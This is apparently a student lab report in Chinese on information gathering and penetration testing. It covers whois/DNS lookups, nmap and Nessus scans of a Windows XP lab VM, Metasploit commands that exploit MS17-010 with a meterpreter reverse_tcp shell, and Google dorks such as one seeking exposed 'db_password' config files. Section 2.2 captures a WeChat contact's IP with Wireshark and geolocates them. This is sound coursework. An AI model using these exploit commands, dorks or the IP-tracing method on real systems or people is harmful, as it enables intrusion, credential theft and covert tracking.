1.實驗內容
1.1 本週學習內容
本週學習了資訊收集與滲透測試相關技術,主要包括Metasploit、nmap和Nessus的使用。
- Metasploit是滲透測試框架,能提供多種攻擊模組,如遠端程式碼執行、提權和後滲透功能(如鍵盤記錄、檔案操作等),可用於模擬攻擊和漏洞利用;
- nmap被用於掃描目標主機的埠和服務,識別其作業系統及執行的服務;
- Nessus則用於漏洞掃描,發現目標主機的安全漏洞並進行風險評估。
1.2 實踐內容
1.2.1 從www.besti.edu.cn、baidu.com、sina.com.cn中選擇一個DNS域名進行查詢,獲取如下資訊:
- DNS註冊人及聯絡方式
- 該域名對應IP地址
- IP地址註冊人及聯絡方式
- IP地址所在國家、城市和具體地理位置
PS:使用whois、dig、nslookup、traceroute、以及各類線上和離線工具進行蒐集資訊(要求必須用WHOIS、dig、nslookup、traceroute、tracert以及線上工具)
1.2.2 嘗試獲取BBS、論壇、QQ、MSN中某一好友的IP地址,並查詢獲取該好友所在的具體地理位置。
1.2.3 使用nmap開源軟體對靶機環境進行掃描,回答以下問題並給出操作命令。
- 靶機IP地址是否活躍
- 靶機開放了哪些TCP和UDP埠
- 靶機安裝了什麼作業系統,版本是多少
- 靶機上安裝了哪些服務
1.2.4 使用Nessus開源軟體對靶機環境進行掃描,回答以下問題並給出操作命令。
- 靶機上開放了哪些埠
- 靶機各個埠上網路服務存在哪些安全漏洞
- 你認為如何攻陷靶機環境,以獲得系統訪問權
1.2.5 個人資訊蒐集
- 透過搜尋引擎搜尋自己在網上的足跡,並確認自己是否有隱私和資訊洩漏問題。
- 練習使用Google hack蒐集技能完成搜尋(至少10種搜尋方法)
2.實驗過程
2.1 域名資訊查詢
本模組的核心任務是透過對域名(如www.besti.edu.cn)的多角度查詢,掌握目標系統的基礎網路資訊,包括DNS註冊資訊、對應的IP地址以及IP歸屬地等。我們將利用命令列工具和線上平臺,逐步完成以下任務。
結論如表1所示:
類別 | 資訊內容 |
---|---|
DNS 註冊人及聯絡方式 | 註冊人組織: 北京百度網訊科技有限公司 (Beijing Baidu Netcom Science Technology Co., Ltd.) 序號產生器構: MarkMonitor Inc. 電話: +1.2086851750 郵箱: abusecomplaints@markmonitor.com |
該域名對應 IP 地址 | IP 地址 1: 39.156.66.10 IP 地址 2: 110.242.68.66 |
IP 地址註冊人及聯絡方式 | IP 地址 1 (39.156.66.10): 註冊人: Haijun Li 註冊組織: China Mobile Communications Corporation 電話: +86 1052686688 傳真: +86 10 52616187 郵箱: hostmaster@chinamobile.com 濫用投訴郵箱: abuse@chinamobile.com IP 地址 2 (110.242.68.66): 註冊人: Kong Lingfei 註冊組織: China Unicom Hebei Province Network 電話: +86-311-86681601 傳真: +86-311-86689210 郵箱: konglf5@chinaunicom.cn 濫用投訴郵箱: zhaoyz3@chinaunicom.cn |
IP 地址所在國家、城市和具體地理位置 | IP 地址 1 (39.156.66.10): 國家: 中國 (CN) 城市: 北京 (Beijing) 區域: 北京 (Beijing) 經緯度: 39.9075, 116.3972 郵編: 100000 具體地址: 29, Jinrong Ave., Xicheng District, Beijing, 100032 IP 地址 2 (110.242.68.66): 版本 1 (WHOIS 查詢): 國家: 中國 (CN) 城市: 石家莊市 (Shi Jiazhuang City) 具體地址: 45, Guang An Street, Shi Jiazhuang City, Hebei Province, 050011 版本 2 (opengps 查詢): 國家: 中國 (CN) 城市: 保定市 (Baoding) 具體地址: 順平縣平安東大街 幸福社群衛生站南 118 米 |
表1:DNS查詢資訊彙總
2.1.1 使用WHOIS查詢DNS註冊人及聯絡方式
WHOIS是一種查詢域名註冊詳細資訊的標準協議,可用於瞭解域名註冊人、序號產生器構及相關聯絡方式。
先輸入以下命令(注意沒有“www.”),結果如圖1:
whois besti.edu.cn
圖1:WHOIS查詢besti.edu.cn的結果
可能是學院官網進行了保護,那麼我們換個網站,結果如圖2
whois baidu.com
圖2:WHOIS查詢baidu.com的結果
易知DNS註冊人及聯絡方式:
- 註冊人組織:北京百度網訊科技有限公司(Beijing Baidu Netcom Science Technology Co., Ltd.)
- 序號產生器構:MarkMonitor Inc.
- 聯絡方式-電話:+1.2086851750
- 聯絡方式-電子郵件:abusecomplaints@markmonitor.com
2.1.2 使用DIG查詢域名對應的IP地址
DIG是一種靈活的DNS查詢工具,可用於獲取域名的DNS記錄,包括A記錄、CNAME記錄等。
執行以下命令(注意沒有“www.”)查詢域名的對應的IP地址,結果如圖3:
dig baidu.com
圖3:使用DIG查詢baidu.com的IP地址
從DIG查詢結果的ANSWER SECTION中提取到以下該域名對應IP地址:
- 39.156.66.10
- 110.242.68.66
2.1.3 使用NSLOOKUP驗證獲取的IP地址
輸入以下命令,結果如圖4所示:
nslookup baidu.com
圖4:使用NSLOOKUP查詢baidu.com的IP地址
從NSLOOKUP的輸出中提取到以下IP地址(同2.1.2):
- 39.156.66.10
- 110.242.68.66
2.1.4 使用WHOIS查詢IP地址註冊資訊
- 查詢IP地址39.156.66.10
whois 39.156.66.10
圖5:WHOIS查詢IP地址39.156.66.10的註冊資訊
可以提取到以下內容:
IP註冊人:Haijun Li
聯絡方式:
- 電話:+86 1052686688
- 傳真:+86 10 52616187
- 郵箱:hostmaster@chinamobile.com
- 濫用投訴郵箱:abuse@chinamobile.com
IP地址所在國家、城市和具體地理位置:
- 國家:中國(CN)
- 城市:北京(Beijing)
- 地址:China Mobile Communications Corporation, 29, Jinrong Ave., Xicheng District, Beijing, 100032
- 查詢IP地址110.242.68.66
whois 110.242.68.66
圖6:WHOIS查詢IP地址110.242.68.66的註冊資訊
可以提取到以下內容:
註冊人:Kong Lingfei
聯絡方式:
- 郵箱:konglf5@chinaunicom.cn
- 電話:+86-311-86681601
- 傳真:+86-311-86689210
- 濫用投訴郵箱:zhaoyz3@chinaunicom.cn
IP地址所在國家、城市和具體地理位置: - 國家:中國(CN)
- 省份:河北省(Hebei Province)
- 城市:石家莊市(Shi Jiazhuang City)
- 地址:China Unicom Hebei province network, 45, Guang An Street, Shi Jiazhuang City, Hebei Province, 050011
2.1.5 使用TRACEROUTE跟蹤網路路由
在Linux系統中輸入:
traceroute baidu.com
圖7:使用TRACEROUTE跟蹤baidu.com的路由
第1跳為本地網路裝置,IP地址為192.168.222.2,響應時間正常。
第2~30跳均顯示***,未返回任何路由節點資訊。
推測中間節點可能被防火牆或路由策略遮蔽,限制了探測包的響應。
或在Windows系統中輸入:
tracert baidu.com
圖8:使用TRACERT跟蹤baidu.com的路由
資料包從本地閘道器(192.168.50.1)出發,經過多個路由節點到達目標(39.156.66.10)。其中,網路路徑部分受限(顯示“請求超時”)但未完全阻斷。
2.1.6 使用線上工具獲取IP地址註冊人及地理位置
-
查詢IP地址39.156.66.10
訪問ipinfo,輸入IP地址39.156.66.10:
圖9:使用線上工具查詢IP地址39.156.66.10的地理位置
查詢得資訊
註冊人:China Mobile Communications Corporation
聯絡方式:
地址:29, Jinrong Ave., Xicheng District, Beijing, 100032
國家:中國(CN)
郵箱:abuse@chinamobile.com
電話:+000000000(佔位符,實際電話號碼未公開)
國家:中國(CN)
城市:北京(Beijing)
區域:北京(Beijing)
經緯度:39.9075,116.3972
郵編:100000 -
查詢IP地址110.242.68.66
訪問opengps,輸入IP地址110.242.68.66,查詢得資訊:
圖10:使用線上工具查詢IP地址110.242.68.66的地理位置
發現位置和使用whois 110.242.68.66
查詢得到的不一致
國家:中國(CN)
省份:河北省
城市:保定市
具體地址:順平縣平安東大街 幸福社群衛生站南118米
2.2 獲取好友的IP地址和具體地理位置
2.2.1 獲取好友的IP地址
開啟wireshark,給微信好友打語音電話
在過濾器中輸入與微信相關的流量規則
udp && ip.addr==192.168.50.16
以下是wireshark抓包截圖
圖11:Wireshark抓取微信語音電話的IP地址
以下是在站長工具箱查詢到的具體地址
圖12:使用站長工具查詢IP地址211.90.238.71的地理位置
查詢得對方IP地址為211.90.238.71,地理位置為浙江杭州,與其真實地理位置相符。且圓圈範圍為杭州主城區,圓心為西溪溼地附近。
圖13為浙大在杭州主城區的校區分佈圖。可見圓圈包括了浙大紫金港校區,即同學所在地。
圖13:浙江大學主要校區分佈圖
在iplocation.net多源IP資料查詢網站上檢視,大多結果為杭州,進一步驗證了正確性。
2.3 使用Nmap開源軟體對靶機環境進行掃描
選擇windows xp pro為靶機,ip為192.168.222.139
選擇kali linux為攻擊機,ip為192.168.222.130
結果如表2所示:
問題 | 結果 |
---|---|
靶機IP地址是否活躍 | 是,靶機 IP 地址 192.168.222.139 活躍,顯示 Host is up (0.00060s latency) 。 |
靶機開放了哪些TCP埠 | 135/tcp(msrpc),139/tcp(netbios-ssn),445/tcp(microsoft-ds)。 |
靶機開放了哪些UDP埠 | 123/udp(NTP),137/udp(NetBIOS 名稱服務), 開放或過濾:138/udp(NetBIOS 資料包服務),445/udp(Microsoft-DS),500/udp(ISAKMP),1025/udp(Blackjack),1900/udp(UPnP),4500/udp(NAT-T IKE)。 |
靶機安裝了什麼作業系統,版本是多少 | Windows 2000(SP2 - SP4),Windows XP(SP2 - SP3),Windows Server 2003(SP0 - SP2)。 |
靶機上安裝了哪些服務 | 25/tcp(tcpwrapped),110/tcp(tcpwrapped)。 |
表2: Nmap掃描結果彙總
2.3.1 靶機IP地址是否活躍
使用以下命令對靶機進行Ping掃描:
nmap -sn 192.168.222.139
命令說明:
- -sn:啟用Ping掃描,僅進行主機發現,不掃描埠
圖14:Nmap執行Ping掃描結果,靶機活躍
輸出顯示Host is up (0.00060s latency)
,靶機IP地址192.168.222.139是活躍的
2.3.2 靶機開放了哪些TCP和UDP埠
在確認靶機線上之後,下一步是對靶機的TCP和UDP埠進行掃描
- TCP埠掃描
使用-sS引數進行SYN掃描:
nmap -sS 192.168.222.139
圖15:Nmap掃描靶機TCP埠結果
可見靶機開放了以下TCP埠:135、139、445
開放的TCP埠對應以下服務:
- 135/tcp:msrpc(Microsoft RPC 服務)
- 139/tcp:netbios-ssn(NetBIOS Session 服務)
- 445/tcp:microsoft-ds(Microsoft-DS 服務)
- UDP埠掃描
使用-sU引數進行UDP掃描:
nmap -sU 192.168.222.139
圖16:Nmap掃描靶機UDP埠結果
可見靶機開放了以下UDP埠:123、137
開放或過濾了以下UDP埠:138、445、500、1025、1900、4500。
UDP埠對應以下服務:
- 123/udp:NTP(網路時間協議)
- 137/udp:NetBIOS 名稱服務
- 138/udp:NetBIOS 資料包服務
- 445/udp:Microsoft-DS(用於檔案和列印共享)
- 500/udp:ISAKMP(網際網路金鑰交換協議)
- 1025/udp:Blackjack(未知服務)
- 1900/udp:UPnP(通用即插即用)
- 4500/udp:NAT-T IKE(網路地址轉換穿透)
2.3.3 靶機安裝了什麼作業系統,版本是多少
nmap -O 192.168.222.139
圖17:Nmap 執行作業系統識別的結果
可見,靶機安裝的作業系統和版本可能為:
- Windows 2000(SP2 - SP4)
- Windows XP(SP2 - SP3)
- Windows Server 2003(SP0 - SP2)
出現多個作業系統版本的原因,主要是因為Nmap的作業系統識別是基於對目標主機網路行為的推測。Nmap會嘗試透過分析目標主機響應的特徵(例如埠開放情況、響應時間、特定協議的實現方式等)來猜測可能的作業系統。但這些特徵往往具有相似性,不同版本的作業系統,尤其是同一廠商的不同版本,可能會展現出類似的網路行為和協議響應,因此Nmap無法精確區分每個版本。
2.3.4 靶機上安裝了哪些服務
nmap -sV 192.168.1.180
圖18:Nmap掃描靶機安裝服務的結果
Nmap掃描結果顯示靶機上安裝了以下服務:
- 25/tcp:tcpwrapped
- 110/tcp:tcpwrapped
2.4 使用Nessus開源軟體對靶機環境進行掃描
歷經千辛萬苦,安裝好了nessus
與2.3一樣:
選擇windows xp pro為靶機,ip為192.168.222.139
選擇kali linux為攻擊機,ip為192.168.222.130
2.4.1 靶機上開放了哪些埠
在Nessus控制檯中,點選右上角的New Scan
按鈕,進入新建掃描介面。
在掃描模板中選擇Host Discovery
模板。
在掃描配置介面,輸入掃描任務的名稱。在Targets欄位中,輸入靶機的IP地址192.168.222.139
。
其他引數,保持預設設定即可。
圖19:Nessus掃描任務配置
配置完成後,點選Launch按鈕開始掃描。
圖20:Nessus執行主機發現掃描的結果
掃描完成後,Nessus會展示目標主機的開放埠。可以看到靶機的埠123,135,137,139,445開放。
2.4.2 靶機各個埠上網路服務存在哪些安全漏洞
在Nessus控制檯中,點選New Scan
按鈕,選擇Advanced Scan
模板。
其他步驟和2.4.1大同小異
圖21:Nessus執行高階掃描的漏洞發現結果
掃描結果顯示,靶機的445埠上執行著SMB服務,且存在MS17-010、MS08-067和MS09-001已知漏洞,靶機的135埠上執行RPC服務,139埠上開放NetBIOS,均可能受到未修補漏洞的影響。
2.4.3 如何攻陷靶機環境,以獲得系統訪問權
可以利用MS17-010 EternalBlue
漏洞
輸入以下命令
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.222.139
set LHOST 192.168.222.130
set PAYLOAD windows/meterpreter/reverse_tcp
run
最後,輸入ipconfig
和sysinfo
進行驗證,確認獲取了系統訪問權
圖22:MS17-010 EternalBlue漏洞驗證結果
2.5 個人資訊蒐集與隱私洩漏檢查
2.5.1 透過搜尋引擎搜尋自己在網上的足跡,並確認隱私和資訊洩漏問題
在谷歌中搜尋我的名字,搜出的都是同名的,沒有我的個人隱私和資訊
圖23:谷歌搜尋自己名字結果
接著搜尋學號,除了實驗報告外,搜出的基本是不相干的,
圖24:谷歌搜尋學號結果
搜尋手機號,沒有相關資訊,但在百度中居然能識別出是溫州的號碼,如圖25所示:
圖25:百度搜尋手機號結果
搜尋郵箱,谷歌中沒有任何搜尋結果。百度中搜尋結果如圖26所示,沒有搜到有用的資訊。
圖26:百度搜尋郵箱結果
接下來,更換搜尋引擎,結果大同小異。
2.5.2 練習使用Google Hack技術完成資訊蒐集(至少10種搜尋方法)
- site:限定搜尋結果來源於特定網站
site:besti.edu.cn 王志強
圖26:使用site限定搜尋來源於學校官網的資訊
限定來源於學校官網搜尋到的老師的資訊
- filetype:限定搜尋檔案型別
filetype:pdf "王勤博"
圖27:使用filetype限定搜尋PDF檔案,查詢包含“王勤博”的內容
逆天了,居然搜出了以前生競的陳年舊事。
- inurl: 搜尋URL中包含指定關鍵詞的頁面
inurl:login
圖28:使用inurl搜尋包含“login”的URL頁面
- intitle:查詢網頁標題中包含特定關鍵詞的頁面
嘗試查詢標題中包含“index of”關鍵詞的頁面,尋找暴露的目錄索引頁面
intitle:"index of"
圖29:使用intitle查詢包含“index of”的網頁標題
可見有兩個網站暴露了目錄索引頁面,且點進去後確實是目錄索引頁。
- intext: 查詢網頁內容中包含特定關鍵詞的頁面
intext:"網鼎杯""北京電子科技學院""第四屆"
圖30:使用intext搜尋包含“網鼎杯”和“北京電子科技學院”的網頁內容
真能搜到我們啊
- allintitle: 查詢標題中同時包含多個關鍵詞的頁面
動動手指,關注下美國大選
allintitle:川普 哈里斯
圖31:使用allintitle查詢包含“川普”和“哈里斯”的網頁標題
- "":引號精確匹配
先看沒有精準匹配的版本
圖32:未使用引號精確匹配搜尋內容
可以看到非常逆天,錯別字都看不出來
圖33:使用引號精確匹配搜尋內容
加上引號後就不犯病了。甚至還搜出了我的同名抖音,樂。
- link:查詢所有指向指定頁面的外部連結
來找找指向遊戲“鳴潮”官網的連結吧
link:mc.kurogames.com
圖34:使用link查詢指向“鳴潮”官網的外部連結
- ext:限定搜尋特定型別的網頁副檔名
搜尋 .conf配置檔案中包含"db_password"關鍵詞的檔案,找找有沒有笨蛋不做安全保護的
ext:conf "db_password"
圖35:使用ext搜尋.conf配置檔案中包含“db_password”的內容
好吧,事實證明並沒有
- -: 排除包含特定關鍵詞的結果
王勤博 -足協 -專家 -電氣 -facebook -企業 -記者 -youtube -醫科 -領英 -名字 -設計 -鐵路 -困難 -梅西 -中等職業 -瘟神 -書記 -河北 -山西 -政府 -開發區 -助學 -寶貝 -越野 -椒江 -機車
真服了,我這名字有這麼大眾?排除這麼多才搜到我的資訊?
居然還能找到我和高中同學做的挑戰杯(狗頭)
圖36:使用-排除無關資訊
- 萬用字元*:填補你在搜尋時不確定或不完整的部分
how to * money
可見非常聰明,猜到了我想搜的 make,earn
圖37:使用*萬用字元搜尋不確定的關鍵詞
- ..:搜尋特定區間內的數字
想要搜尋北京人均價格100-500的海鮮餐廳
"北京""海鮮" "人均"100..500
搜出來的結果基本符合期望,搜尋效果和在小紅書比怎麼樣另說。
圖38:使用..搜尋價格區間內的海鮮餐廳
- before/after:限定日期
搜搜李子柒復出後,日期的格式為yyyy-mm-dd
李子柒 after:20241001
圖39:使用after限定日期進行資訊篩選
3.問題及解決方案
- 問題1:更新外掛時出現"Nessus is offline and cannot do software updates via the feed.",導致nessus中"no plugins"
圖40:Nessus 更新外掛時出現離線錯誤的截圖 - 問題1解決方案:先執行命令
./nessuscli fetch -register-offline nessus.license
,再執行命令./nessuscli update all-2.0.tar.gz
。按照這個順序多試幾次。 - 問題2:多次安裝nessus失敗後,Kali的圖形化介面消失,只剩黑屏
- 問題2解決方案:試了很多教程不行,重灌解決。
- 問題3:2.4.3中利用MS17-010 EternalBlue漏洞時,遇到了錯誤
[-] 192.168.222.139:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
- 問題3解決方案:這是因為使用的MS17-010 EternalBlue漏洞模組只支援64位的系統,而你的靶機是32位的Windows XP。只需將使用的模組改為
use exploit/windows/smb/ms17_010_psexec
即可。
4.學習感悟、思考等
透過本次實驗,我掌握了資訊蒐集、漏洞利用和滲透測試的基本過程。從使用nmap和whois等工具獲取目標資訊,到透過Metasploit利用MS17-010漏洞進行攻擊,體驗了攻擊的全流程。在實驗中,我認識到攻擊需要根據目標環境選擇合適的漏洞模組,針對32位系統採用不同的攻擊方法。實驗加深了我對滲透測試的理解,提升了我分析掃描結果和選擇攻擊手段的能力。
參考資料
- nessus快速安裝使用指南(非常詳細)零基礎入門到精通,收藏這一篇就夠了
- kali更新後出現黑屏,右上角出現游標閃爍不能開機的情況
- Nessus Agent Updates for Offline host